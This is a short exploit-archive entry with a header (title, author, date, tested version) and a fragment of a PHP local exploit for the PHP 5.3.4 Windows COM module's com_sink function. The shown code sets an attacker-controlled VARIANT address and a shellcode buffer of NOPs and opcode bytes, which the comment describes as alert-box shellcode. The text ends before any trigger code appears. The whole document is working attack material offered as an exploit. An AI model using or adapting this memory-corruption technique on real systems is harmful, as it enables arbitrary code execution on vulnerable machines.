# Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit
# Google Dork: Nil
# Date: 9/10/2012
# Author: FB1H2S
# Software Link: PHP Windows
# Version: [5.3.4]
# Tested on: Microsoft XP Pro 2002 SP2
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll
$vVar = new VARIANT(0x048d0000+180);
//alert box Shellcode
$buffer = "\x90\x90\x90".
"\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".
"\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";